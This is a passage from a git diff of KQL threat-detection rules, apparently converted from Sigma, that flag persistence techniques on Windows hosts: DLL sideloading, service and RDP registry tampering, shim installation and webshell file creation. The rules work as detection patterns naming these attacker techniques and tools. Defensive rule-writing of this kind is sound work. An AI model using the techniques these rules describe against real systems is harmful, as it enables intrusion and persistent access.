Files\\Common Files (x86)\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\")) or (InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\msiexec.exe", "C:\\Windows\\SysWOW64\\msiexec.exe", "C:\\Windows\\System32\\regsvr32.exe", "C:\\Windows\\SysWOW64\\regsvr32.exe"))))) and (not((((InitiatingProcessFolderPath in~ ("C:\\Program Files\\Avast Software\\Avast\\RegSvr.exe", "C:\\Program Files (x86)\\Avast Software\\Avast\\RegSvr.exe")) and RegistryKey endswith "\\Microsoft\\Office\\Outlook\\Addins\\Avast.AsOutExt*") or ((InitiatingProcessFolderPath in~ ("C:\\Program Files\\AVG\\Antivirus\\RegSvr.exe", "C:\\Program Files (x86)\\AVG\\Antivirus\\RegSvr.exe")) and RegistryKey endswith "\\Microsoft\\Office\\Outlook\\Addins\\Antivirus.AsOutExt*")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_privilege_escalation_via_service_permissions_weakness.kql b/KQL/rules/Persistence/potential_privilege_escalation_via_service_permissions_weakness.kql index b7e27451..577d9e0a 100644 --- a/KQL/rules/Persistence/potential_privilege_escalation_via_service_permissions_weakness.kql +++ b/KQL/rules/Persistence/potential_privilege_escalation_via_service_permissions_weakness.kql @@ -1,10 +1,10 @@ -// Title: Potential Privilege Escalation via Service Permissions Weakness -// Author: Teymur Kheirkhabarov -// Date: 2019-10-26 -// Level: high -// Description: Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.011 - -DeviceProcessEvents +// Title: Potential Privilege Escalation via Service Permissions Weakness +// Author: Teymur Kheirkhabarov +// Date: 2019-10-26 +// Level: high +// Description: Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.011 + +DeviceProcessEvents | where (ProcessCommandLine contains "\\ImagePath" or ProcessCommandLine contains "\\FailureCommand" or ProcessCommandLine contains "\\ServiceDll") and (ProcessCommandLine contains "ControlSet" and ProcessCommandLine contains "services") and (ProcessIntegrityLevel in~ ("Medium", "S-1-16-8192")) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_qakbot_registry_activity.kql b/KQL/rules/Persistence/potential_qakbot_registry_activity.kql index 4bffdbfa..225ea1f1 100644 --- a/KQL/rules/Persistence/potential_qakbot_registry_activity.kql +++ b/KQL/rules/Persistence/potential_qakbot_registry_activity.kql @@ -1,10 +1,10 @@ -// Title: Potential Qakbot Registry Activity -// Author: Hieu Tran -// Date: 2023-03-13 -// Level: high -// Description: Detects a registry key used by IceID in a campaign that distributes malicious OneNote files -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1112 - -DeviceRegistryEvents +// Title: Potential Qakbot Registry Activity +// Author: Hieu Tran +// Date: 2023-03-13 +// Level: high +// Description: Detects a registry key used by IceID in a campaign that distributes malicious OneNote files +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 + +DeviceRegistryEvents | where RegistryKey endswith "\\Software\\firm\\soft\\Name" \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_rcdll_dll_sideloading.kql b/KQL/rules/Persistence/potential_rcdll_dll_sideloading.kql index 57dcb81d..a3f1ecd5 100644 --- a/KQL/rules/Persistence/potential_rcdll_dll_sideloading.kql +++ b/KQL/rules/Persistence/potential_rcdll_dll_sideloading.kql @@ -1,10 +1,10 @@ -// Title: Potential Rcdll.DLL Sideloading -// Author: X__Junior (Nextron Systems) -// Date: 2023-03-13 -// Level: high -// Description: Detects potential DLL sideloading of rcdll.dll -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 - -DeviceImageLoadEvents +// Title: Potential Rcdll.DLL Sideloading +// Author: X__Junior (Nextron Systems) +// Date: 2023-03-13 +// Level: high +// Description: Detects potential DLL sideloading of rcdll.dll +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 + +DeviceImageLoadEvents | where FolderPath endswith "\\rcdll.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\Microsoft Visual Studio\\" or FolderPath startswith "C:\\Program Files (x86)\\Windows Kits\\"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_rjvplatform_dll_sideloading_from_default_location.kql b/KQL/rules/Persistence/potential_rjvplatform_dll_sideloading_from_default_location.kql index 59111e2b..96cf94db 100644 --- a/KQL/rules/Persistence/potential_rjvplatform_dll_sideloading_from_default_location.kql +++ b/KQL/rules/Persistence/potential_rjvplatform_dll_sideloading_from_default_location.kql @@ -1,10 +1,10 @@ -// Title: Potential RjvPlatform.DLL Sideloading From Default Location -// Author: X__Junior (Nextron Systems) -// Date: 2023-06-09 -// Level: medium -// Description: Detects loading of "RjvPlatform.dll" by the "SystemResetPlatform.exe" binary which can be abused as a method of DLL side loading since the "$SysReset" directory isn't created by default. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 - -DeviceImageLoadEvents +// Title: Potential RjvPlatform.DLL Sideloading From Default Location +// Author: X__Junior (Nextron Systems) +// Date: 2023-06-09 +// Level: medium +// Description: Detects loading of "RjvPlatform.dll" by the "SystemResetPlatform.exe" binary which can be abused as a method of DLL side loading since the "$SysReset" directory isn't created by default. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 + +DeviceImageLoadEvents | where InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\SystemResetPlatform\\SystemResetPlatform.exe" and FolderPath =~ "C:\\$SysReset\\Framework\\Stack\\RjvPlatform.dll" \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_rjvplatform_dll_sideloading_from_non_default_location.kql b/KQL/rules/Persistence/potential_rjvplatform_dll_sideloading_from_non_default_location.kql index be764d08..e8ce9673 100644 --- a/KQL/rules/Persistence/potential_rjvplatform_dll_sideloading_from_non_default_location.kql +++ b/KQL/rules/Persistence/potential_rjvplatform_dll_sideloading_from_non_default_location.kql @@ -1,12 +1,12 @@ -// Title: Potential RjvPlatform.DLL Sideloading From Non-Default Location -// Author: X__Junior (Nextron Systems) -// Date: 2023-06-09 -// Level: high -// Description: Detects potential DLL sideloading of "RjvPlatform.dll" by "SystemResetPlatform.exe" located in a non-default location. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 -// False Positives: -// - Unlikely - -DeviceImageLoadEvents +// Title: Potential RjvPlatform.DLL Sideloading From Non-Default Location +// Author: X__Junior (Nextron Systems) +// Date: 2023-06-09 +// Level: high +// Description: Detects potential DLL sideloading of "RjvPlatform.dll" by "SystemResetPlatform.exe" located in a non-default location. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 +// False Positives: +// - Unlikely + +DeviceImageLoadEvents | where (InitiatingProcessFolderPath =~ "\\SystemResetPlatform.exe" and FolderPath endswith "\\RjvPlatform.dll") and (not(InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\SystemResetPlatform\\")) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_roboform_dll_sideloading.kql b/KQL/rules/Persistence/potential_roboform_dll_sideloading.kql index 88e63fc1..f0febe69 100644 --- a/KQL/rules/Persistence/potential_roboform_dll_sideloading.kql +++ b/KQL/rules/Persistence/potential_roboform_dll_sideloading.kql @@ -1,12 +1,12 @@ -// Title: Potential RoboForm.DLL Sideloading -// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-14 -// Level: medium -// Description: Detects potential DLL sideloading of "roboform.dll", a DLL used by RoboForm Password Manager -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 -// False Positives: -// - If installed on a per-user level, the path would be located in "AppData\Local". Add additional filters to reflect this mode of installation - -DeviceImageLoadEvents +// Title: Potential RoboForm.DLL Sideloading +// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-14 +// Level: medium +// Description: Detects potential DLL sideloading of "roboform.dll", a DLL used by RoboForm Password Manager +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 +// False Positives: +// - If installed on a per-user level, the path would be located in "AppData\Local". Add additional filters to reflect this mode of installation + +DeviceImageLoadEvents | where (FolderPath endswith "\\roboform.dll" or FolderPath endswith "\\roboform-x64.dll") and (not(((InitiatingProcessFolderPath endswith "\\robotaskbaricon.exe" or InitiatingProcessFolderPath endswith "\\robotaskbaricon-x64.exe") and (InitiatingProcessFolderPath startswith " C:\\Program Files (x86)\\Siber Systems\\AI RoboForm\\" or InitiatingProcessFolderPath startswith " C:\\Program Files\\Siber Systems\\AI RoboForm\\")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_sentinelone_shell_context_menu_scan_command_tampering.kql b/KQL/rules/Persistence/potential_sentinelone_shell_context_menu_scan_command_tampering.kql index 647717f9..9a5cd754 100644 --- a/KQL/rules/Persistence/potential_sentinelone_shell_context_menu_scan_command_tampering.kql +++ b/KQL/rules/Persistence/potential_sentinelone_shell_context_menu_scan_command_tampering.kql @@ -1,10 +1,10 @@ -// Title: Potential SentinelOne Shell Context Menu Scan Command Tampering -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2024-03-06 -// Level: medium -// Description: Detects potentially suspicious changes to the SentinelOne context menu scan command by a process other than SentinelOne. -// MITRE Tactic: Persistence -// Tags: attack.persistence - -DeviceRegistryEvents +// Title: Potential SentinelOne Shell Context Menu Scan Command Tampering +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-03-06 +// Level: medium +// Description: Detects potentially suspicious changes to the SentinelOne context menu scan command by a process other than SentinelOne. +// MITRE Tactic: Persistence +// Tags: attack.persistence + +DeviceRegistryEvents | where RegistryKey endswith "\\shell\\SentinelOneScan\\command*" and (not(((InitiatingProcessFolderPath endswith "C:\\Program Files\\SentinelOne\\" or InitiatingProcessFolderPath endswith "C:\\Program Files (x86)\\SentinelOne\\") or (RegistryValueData contains "\\SentinelScanFromContextMenu.exe" and (RegistryValueData startswith "C:\\Program Files\\SentinelOne\\Sentinel Agent" or RegistryValueData startswith "C:\\Program Files (x86)\\SentinelOne\\Sentinel Agent"))))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_shelldispatch_dll_sideloading.kql b/KQL/rules/Persistence/potential_shelldispatch_dll_sideloading.kql index 7211edc2..ec25ca4a 100644 --- a/KQL/rules/Persistence/potential_shelldispatch_dll_sideloading.kql +++ b/KQL/rules/Persistence/potential_shelldispatch_dll_sideloading.kql @@ -1,12 +1,12 @@ -// Title: Potential ShellDispatch.DLL Sideloading -// Author: X__Junior (Nextron Systems) -// Date: 2023-06-20 -// Level: medium -// Description: Detects potential DLL sideloading of "ShellDispatch.dll" -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 -// False Positives: -// - Some installers may trigger some false positives - -DeviceImageLoadEvents +// Title: Potential ShellDispatch.DLL Sideloading +// Author: X__Junior (Nextron Systems) +// Date: 2023-06-20 +// Level: medium +// Description: Detects potential DLL sideloading of "ShellDispatch.dll" +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 +// False Positives: +// - Some installers may trigger some false positives + +DeviceImageLoadEvents | where FolderPath endswith "\\ShellDispatch.dll" and (not(((FolderPath contains ":\\Users\\" and FolderPath contains "\\AppData\\Local\\Temp\\") or FolderPath contains ":\\Windows\\Temp\\"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_shim_database_persistence_via_sdbinst_exe.kql b/KQL/rules/Persistence/potential_shim_database_persistence_via_sdbinst_exe.kql index 5fe0eea1..fbb6dafc 100644 --- a/KQL/rules/Persistence/potential_shim_database_persistence_via_sdbinst_exe.kql +++ b/KQL/rules/Persistence/potential_shim_database_persistence_via_sdbinst_exe.kql @@ -1,11 +1,11 @@ -// Title: Potential Shim Database Persistence via Sdbinst.EXE -// Author: Markus Neis -// Date: 2019-01-16 -// Level: medium -// Description: Detects installation of a new shim using sdbinst.exe. -// Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.011 - -DeviceProcessEvents +// Title: Potential Shim Database Persistence via Sdbinst.EXE +// Author: Markus Neis +// Date: 2019-01-16 +// Level: medium +// Description: Detects installation of a new shim using sdbinst.exe. +// Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.011 + +DeviceProcessEvents | where (ProcessCommandLine contains ".sdb" and (FolderPath endswith "\\sdbinst.exe" or ProcessVersionInfoOriginalFileName =~ "sdbinst.exe")) and (not(((ProcessCommandLine contains ":\\Program Files (x86)\\IIS Express\\iisexpressshim.sdb" or ProcessCommandLine contains ":\\Program Files\\IIS Express\\iisexpressshim.sdb") and InitiatingProcessFolderPath endswith "\\msiexec.exe"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_smadhook_dll_sideloading.kql b/KQL/rules/Persistence/potential_smadhook_dll_sideloading.kql index ce441f53..6272a136 100644 --- a/KQL/rules/Persistence/potential_smadhook_dll_sideloading.kql +++ b/KQL/rules/Persistence/potential_smadhook_dll_sideloading.kql @@ -1,12 +1,12 @@ -// Title: Potential SmadHook.DLL Sideloading -// Author: X__Junior (Nextron Systems) -// Date: 2023-06-01 -// Level: high -// Description: Detects potential DLL sideloading of "SmadHook.dll", a DLL used by SmadAV antivirus -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 -// False Positives: -// - Unlikely - -DeviceImageLoadEvents +// Title: Potential SmadHook.DLL Sideloading +// Author: X__Junior (Nextron Systems) +// Date: 2023-06-01 +// Level: high +// Description: Detects potential DLL sideloading of "SmadHook.dll", a DLL used by SmadAV antivirus +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 +// False Positives: +// - Unlikely + +DeviceImageLoadEvents | where (FolderPath endswith "\\SmadHook32c.dll" or FolderPath endswith "\\SmadHook64c.dll") and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\SMADAV\\SmadavProtect32.exe", "C:\\Program Files (x86)\\SMADAV\\SmadavProtect64.exe", "C:\\Program Files\\SMADAV\\SmadavProtect32.exe", "C:\\Program Files\\SMADAV\\SmadavProtect64.exe")) and (FolderPath startswith "C:\\Program Files (x86)\\SMADAV\\" or FolderPath startswith "C:\\Program Files\\SMADAV\\")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_solidpdfcreator_dll_sideloading.kql b/KQL/rules/Persistence/potential_solidpdfcreator_dll_sideloading.kql index b60ddd2d..5897c31d 100644 --- a/KQL/rules/Persistence/potential_solidpdfcreator_dll_sideloading.kql +++ b/KQL/rules/Persistence/potential_solidpdfcreator_dll_sideloading.kql @@ -1,10 +1,10 @@ -// Title: Potential SolidPDFCreator.DLL Sideloading -// Author: X__Junior (Nextron Systems) -// Date: 2023-05-07 -// Level: medium -// Description: Detects potential DLL sideloading of "SolidPDFCreator.dll" -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 - -DeviceImageLoadEvents +// Title: Potential SolidPDFCreator.DLL Sideloading +// Author: X__Junior (Nextron Systems) +// Date: 2023-05-07 +// Level: medium +// Description: Detects potential DLL sideloading of "SolidPDFCreator.dll" +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 + +DeviceImageLoadEvents | where FolderPath endswith "\\SolidPDFCreator.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\SolidDocuments\\SolidPDFCreator\\" or FolderPath startswith "C:\\Program Files\\SolidDocuments\\SolidPDFCreator\\") and InitiatingProcessFolderPath endswith "\\SolidPDFCreator.exe"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_suspicious_powershell_module_file_created.kql b/KQL/rules/Persistence/potential_suspicious_powershell_module_file_created.kql index ce854186..46850117 100644 --- a/KQL/rules/Persistence/potential_suspicious_powershell_module_file_created.kql +++ b/KQL/rules/Persistence/potential_suspicious_powershell_module_file_created.kql @@ -1,12 +1,12 @@ -// Title: Potential Suspicious PowerShell Module File Created -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-09 -// Level: medium -// Description: Detects the creation of a new PowerShell module in the first folder of the module directory structure "\WindowsPowerShell\Modules\malware\malware.psm1". This is somewhat an uncommon practice as legitimate modules often includes a version folder. -// MITRE Tactic: Persistence -// Tags: attack.persistence -// False Positives: -// - False positive rate will vary depending on the environments. Additional filters might be required to make this logic usable in production. - -DeviceFileEvents +// Title: Potential Suspicious PowerShell Module File Created +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-09 +// Level: medium +// Description: Detects the creation of a new PowerShell module in the first folder of the module directory structure "\WindowsPowerShell\Modules\malware\malware.psm1". This is somewhat an uncommon practice as legitimate modules often includes a version folder. +// MITRE Tactic: Persistence +// Tags: attack.persistence +// False Positives: +// - False positive rate will vary depending on the environments. Additional filters might be required to make this logic usable in production. + +DeviceFileEvents | where (FolderPath contains "\\WindowsPowerShell\\Modules\\" and FolderPath contains "\\.ps") or (FolderPath contains "\\WindowsPowerShell\\Modules\\" and FolderPath contains "\\.dll") \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_suspicious_registry_file_imported_via_reg_exe.kql b/KQL/rules/Persistence/potential_suspicious_registry_file_imported_via_reg_exe.kql index 34910143..eac0d05c 100644 --- a/KQL/rules/Persistence/potential_suspicious_registry_file_imported_via_reg_exe.kql +++ b/KQL/rules/Persistence/potential_suspicious_registry_file_imported_via_reg_exe.kql @@ -1,12 +1,12 @@ -// Title: Potential Suspicious Registry File Imported Via Reg.EXE -// Author: frack113, Nasreddine Bencherchali -// Date: 2022-08-01 -// Level: medium -// Description: Detects the import of '.reg' files from suspicious paths using the 'reg.exe' utility -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.t1112, attack.defense-evasion -// False Positives: -// - Legitimate import of keys - -DeviceProcessEvents +// Title: Potential Suspicious Registry File Imported Via Reg.EXE +// Author: frack113, Nasreddine Bencherchali +// Date: 2022-08-01 +// Level: medium +// Description: Detects the import of '.reg' files from suspicious paths using the 'reg.exe' utility +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1112, attack.defense-evasion +// False Positives: +// - Legitimate import of keys + +DeviceProcessEvents | where ProcessCommandLine contains " import " and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and (ProcessCommandLine contains "C:\\Users\\" or ProcessCommandLine contains "%temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "%appdata%" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "C:\\Windows\\Temp\\" or ProcessCommandLine contains "C:\\ProgramData\\") \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_tampering_with_rdp_related_registry_keys_via_reg_exe.kql b/KQL/rules/Persistence/potential_tampering_with_rdp_related_registry_keys_via_reg_exe.kql index 4c732da6..e5791364 100644 --- a/KQL/rules/Persistence/potential_tampering_with_rdp_related_registry_keys_via_reg_exe.kql +++ b/KQL/rules/Persistence/potential_tampering_with_rdp_related_registry_keys_via_reg_exe.kql @@ -1,10 +1,10 @@ -// Title: Potential Tampering With RDP Related Registry Keys Via Reg.EXE -// Author: pH-T (Nextron Systems), @Kostastsale, TheDFIRReport -// Date: 2022-02-12 -// Level: high -// Description: Detects the execution of "reg.exe" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\Control\Terminal Server' values -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.lateral-movement, attack.t1021.001, attack.t1112 - -DeviceProcessEvents +// Title: Potential Tampering With RDP Related Registry Keys Via Reg.EXE +// Author: pH-T (Nextron Systems), @Kostastsale, TheDFIRReport +// Date: 2022-02-12 +// Level: high +// Description: Detects the execution of "reg.exe" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\Control\Terminal Server' values +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.lateral-movement, attack.t1021.001, attack.t1112 + +DeviceProcessEvents | where ((ProcessCommandLine contains " add " and ProcessCommandLine contains "\\CurrentControlSet\\Control\\Terminal Server" and ProcessCommandLine contains "REG_DWORD" and ProcessCommandLine contains " /f") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) and ((ProcessCommandLine contains "Licensing Core" and ProcessCommandLine contains "EnableConcurrentSessions") or (ProcessCommandLine contains "WinStations\\RDP-Tcp" or ProcessCommandLine contains "MaxInstanceCount" or ProcessCommandLine contains "fEnableWinStation" or ProcessCommandLine contains "TSUserEnabled" or ProcessCommandLine contains "TSEnabled" or ProcessCommandLine contains "TSAppCompat" or ProcessCommandLine contains "IdleWinStationPoolCount" or ProcessCommandLine contains "TSAdvertise" or ProcessCommandLine contains "AllowTSConnections" or ProcessCommandLine contains "fSingleSessionPerUser" or ProcessCommandLine contains "fDenyTSConnections")) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_vivaldi_elf_dll_sideloading.kql b/KQL/rules/Persistence/potential_vivaldi_elf_dll_sideloading.kql index 724c5d35..88457514 100644 --- a/KQL/rules/Persistence/potential_vivaldi_elf_dll_sideloading.kql +++ b/KQL/rules/Persistence/potential_vivaldi_elf_dll_sideloading.kql @@ -1,10 +1,10 @@ -// Title: Potential Vivaldi_elf.DLL Sideloading -// Author: X__Junior (Nextron Systems) -// Date: 2023-08-03 -// Level: medium -// Description: Detects potential DLL sideloading of "vivaldi_elf.dll" -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 - -DeviceImageLoadEvents +// Title: Potential Vivaldi_elf.DLL Sideloading +// Author: X__Junior (Nextron Systems) +// Date: 2023-08-03 +// Level: medium +// Description: Detects potential DLL sideloading of "vivaldi_elf.dll" +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 + +DeviceImageLoadEvents | where FolderPath endswith "\\vivaldi_elf.dll" and (not((FolderPath contains "\\Vivaldi\\Application\\" and InitiatingProcessFolderPath endswith "\\Vivaldi\\Application\\vivaldi.exe"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_waveedit_dll_sideloading.kql b/KQL/rules/Persistence/potential_waveedit_dll_sideloading.kql index 4c5051ad..5b2c2e23 100644 --- a/KQL/rules/Persistence/potential_waveedit_dll_sideloading.kql +++ b/KQL/rules/Persistence/potential_waveedit_dll_sideloading.kql @@ -1,12 +1,12 @@ -// Title: Potential Waveedit.DLL Sideloading -// Author: X__Junior (Nextron Systems) -// Date: 2023-06-14 -// Level: high -// Description: Detects potential DLL sideloading of "waveedit.dll", which is part of the Nero WaveEditor audio editing software. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 -// False Positives: -// - Unlikely - -DeviceImageLoadEvents +// Title: Potential Waveedit.DLL Sideloading +// Author: X__Junior (Nextron Systems) +// Date: 2023-06-14 +// Level: high +// Description: Detects potential DLL sideloading of "waveedit.dll", which is part of the Nero WaveEditor audio editing software. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 +// False Positives: +// - Unlikely + +DeviceImageLoadEvents | where FolderPath endswith "\\waveedit.dll" and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Nero\\Nero Apps\\Nero WaveEditor\\waveedit.exe", "C:\\Program Files\\Nero\\Nero Apps\\Nero WaveEditor\\waveedit.exe")) and (FolderPath startswith "C:\\Program Files (x86)\\Nero\\Nero Apps\\Nero WaveEditor\\" or FolderPath startswith "C:\\Program Files\\Nero\\Nero Apps\\Nero WaveEditor\\")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_webshell_creation_on_static_website.kql b/KQL/rules/Persistence/potential_webshell_creation_on_static_website.kql index 3edd1ca6..397ebdfd 100644 --- a/KQL/rules/Persistence/potential_webshell_creation_on_static_website.kql +++ b/KQL/rules/Persistence/potential_webshell_creation_on_static_website.kql @@ -1,12 +1,12 @@ -// Title: Potential Webshell Creation On Static Website -// Author: Beyu Denis, oscd.community, Tim Shelton, Thurein Oo -// Date: 2019-10-22 -// Level: medium -// Description: Detects the creation of files with certain extensions on a static web site. This can be indicative of potential uploads of a web shell. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.t1505.003 -// False Positives: -// - Legitimate administrator or developer creating legitimate executable files in a web application folder - -DeviceFileEvents +// Title: Potential Webshell Creation On Static Website +// Author: Beyu Denis, oscd.community, Tim Shelton, Thurein Oo +// Date: 2019-10-22 +// Level: medium +// Description: Detects the creation of files with certain extensions on a static web site. This can be indicative of potential uploads of a web shell. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1505.003 +// False Positives: +// - Legitimate administrator or developer creating legitimate executable files in a web application folder + +DeviceFileEvents | where (((FolderPath contains ".ashx" or FolderPath contains ".asp" or FolderPath contains ".ph" or FolderPath contains ".soap") and FolderPath contains "\\inetpub\\wwwroot\\") or (FolderPath contains ".ph" and (FolderPath contains "\\www\\" or FolderPath contains "\\htdocs\\" or FolderPath contains "\\html\\"))) and (not((FolderPath contains "\\xampp" or InitiatingProcessFolderPath =~ "System" or (FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\Windows\\Temp\\")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_wwlib_dll_sideloading.kql b/KQL/rules/Persistence/potential_wwlib_dll_sideloading.kql index 0c027af5..cdc912b1 100644 --- a/KQL/rules/Persistence/potential_wwlib_dll_sideloading.kql +++ b/KQL/rules/Persistence/potential_wwlib_dll_sideloading.kql @@ -1,10 +1,10 @@ -// Title: Potential WWlib.DLL Sideloading -// Author: X__Junior (Nextron Systems) -// Date: 2023-05-18 -// Level: medium -// Description: Detects potential DLL sideloading of "wwlib.dll" -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 - -DeviceImageLoadEvents +// Title: Potential WWlib.DLL Sideloading +// Author: X__Junior (Nextron Systems) +// Date: 2023-05-18 +// Level: medium +// Description: Detects potential DLL sideloading of "wwlib.dll" +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 + +DeviceImageLoadEvents | where FolderPath endswith "\\wwlib.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\" or FolderPath startswith "C:\\Program Files\\Microsoft Office\\") and InitiatingProcessFolderPath endswith "\\winword.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Office\\")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potentially_suspicious_child_process_of_keyscrambler_exe.kql b/KQL/rules/Persistence/potentially_suspicious_child_process_of_keyscrambler_exe.kql index d746f12d..8d07fe60 100644 --- a/KQL/rules/Persistence/potentially_suspicious_child_process_of_keyscrambler_exe.kql +++ b/KQL/rules/Persistence/potentially_suspicious_child_process_of_keyscrambler_exe.kql @@ -1,10 +1,10 @@ -// Title: Potentially Suspicious Child Process of KeyScrambler.exe -// Author: Swachchhanda Shrawan Poudel -// Date: 2024-05-13 -// Level: medium -// Description: Detects potentially suspicious child processes of KeyScrambler.exe -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.execution, attack.defense-evasion, attack.privilege-escalation, attack.t1203, attack.t1574.001 - -DeviceProcessEvents +// Title: Potentially Suspicious Child Process of KeyScrambler.exe +// Author: Swachchhanda Shrawan Poudel +// Date: 2024-05-13 +// Level: medium +// Description: Detects potentially suspicious child processes of KeyScrambler.exe +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.execution, attack.defense-evasion, attack.privilege-escalation, attack.t1203, attack.t1574.001 + +DeviceProcessEvents | where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "cscript.exe", "mshta.exe", "PowerShell.EXE", "pwsh.dll", "regsvr32.exe", "RUNDLL32.EXE", "wscript.exe"))) and InitiatingProcessFolderPath endswith "\\KeyScrambler.exe" \ No newline at end of file diff --git a/KQL/rules/Persistence/potentially_suspicious_desktop_background_change_using_reg_exe.kql b/KQL/rules/Persistence/potentially_suspicious_desktop_background_change_using_reg_exe.kql index 1b55b96f..41d7f565 100644 --- a/KQL/rules/Persistence/potentially_suspicious_desktop_background_change_using_reg_exe.kql +++ 